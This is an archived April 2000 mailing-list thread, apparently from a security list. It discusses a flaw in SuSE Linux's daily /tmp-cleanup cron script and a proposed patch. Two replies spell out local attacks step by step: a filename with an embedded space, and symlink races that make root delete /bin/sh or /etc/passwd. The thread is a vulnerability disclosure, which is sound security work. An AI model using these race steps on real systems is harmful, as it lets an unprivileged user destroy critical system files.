Excuse-me please! It seems, that my little patch was not a so good
idea! So, thanks to Pavel Kankovsky and to James Antill!
Peter
--
Peter Münster
http://gmv.spm.univ-rennes1.fr/~peter/
---------- Forwarded message ----------
Date: Sun, 23 Apr 2000 00:03:04 +0200
From: Pavel Kankovsky
If MAX_DAYS_IN_TMP > 0 in /etc/rc.config on a SuSE-Linux system, a local user can delete arbitrary files by doing some commands like these: mkdir -p "/tmp/hhh /somedirectory" touch -t some-early-date "/tmp/hhh /somedirectory/somefile" sleep 1d ... Here a possible patch for suse-package aaa_base-2000.1.3-0: ... + find $TMP_DIR/. $OMIT ! -type d \ + -atime +$MAX_DAYS_IN_TMP -exec rm -f '{}' ';' + find $TMP_DIR/. $OMIT -depth -type d -empty -mindepth 1 \ + -mtime +$MAX_DAYS_IN_TMP -exec rmdir '{}' ';'
mkdir -p /tmp/somedirectory/{_junk,bin}
fill_with_lots_of_junk_to_slow_find_down /tmp/somedirectory/_junk
find /tmp/somedirectory -type f | xargs touch -t some-early-date
touch -t some-early-date /tmp/somedirectory/bin/sh
wait_until_aaa_base_starts_searching /tmp/somedirectory/_junk
mv /tmp/somedirectory /tmp/somedirectory2
ln -s / /tmp/somedirectory
watch /bin/sh disappear...this will teach you not to use find and
rm to clean /tmp :)
--Pavel Kankovsky aka Peak [ Boycott Microsoft--http://www.vcnet.com/bms ]
"Resistance is futile. Open your source code and prepare for assimilation."
---------- Forwarded message ----------
Date: 21 Apr 2000 16:20:24 -0400
From: James Antill
Hello, If MAX_DAYS_IN_TMP > 0 in /etc/rc.config on a SuSE-Linux system, a local user can delete arbitrary files by doing some commands like these: mkdir -p "/tmp/hhh /somedirectory" touch -t some-early-date "/tmp/hhh /somedirectory/somefile" sleep 1d
The bug is in /etc/cron.daily/aaa_base for SuSE version 6.3 or perhaps also in /root/bin/cron.daily for older SuSE versions. Tested on SuSE 6.0 and 6.3 but probably existent on earlier versions.
Here a possible patch for suse-package aaa_base-2000.1.3-0:
--- aaa_base~ Mon Jan 3 18:16:55 2000 +++ aaa_base Fri Apr 21 08:42:19 2000 @@ -158,20 +158,10 @@ done
for TMP_DIR in $TMP_DIRS_TO_CLEAR ; do - for DEL_FILE in `find $TMP_DIR/. $OMIT \( -type f -o -type l \) \ - -atime +$MAX_DAYS_IN_TMP | sort -r` ; do - rm -f $DEL_FILE - DEL_DIR=`dirname $DEL_FILE` - if [ "$DEL_DIR" != "$TMP_DIR/." ] ; then - rmdir $DEL_DIR 2> /dev/null - fi - done - done
Oh dear :O ... apart from the above flaw (--print0 anyone) above this is _very_ raceable by doing... mkdir -p /tmp/blah/1 mkdir -p /tmp/blah/2 mkdir -p /tmp/blah/3 Do the above a couple of thousand times... touch /tmp/blah/199/passwd wait for the find part of the script to come along... mv /tmp/blah/199 /tmp/blah/.199 && ln -s /etc /tmp/blah/199
- for DEL_DIR in `find $TMP_DIR/. $OMIT \( -type d \) \ - -ctime +$MAX_DAYS_IN_TMP | sort -r` ; do - if [ "$DEL_DIR" != "$TMP_DIR/." ] ; then - rmdir $DEL_DIR 2> /dev/null - fi + find $TMP_DIR/. $OMIT ! -type d \ + -atime +$MAX_DAYS_IN_TMP -exec rm -f '{}' ';' + find $TMP_DIR/. $OMIT -depth -type d -empty -mindepth 1 \ + -mtime +$MAX_DAYS_IN_TMP -exec rmdir '{}' ';' done fi
This doesn't fix it either, it just makes the race smaller. -- James Antill -- james@and.org "If we can't keep this sort of thing out of the kernel, we might as well pack it up and go run Solaris." -- Larry McVoy.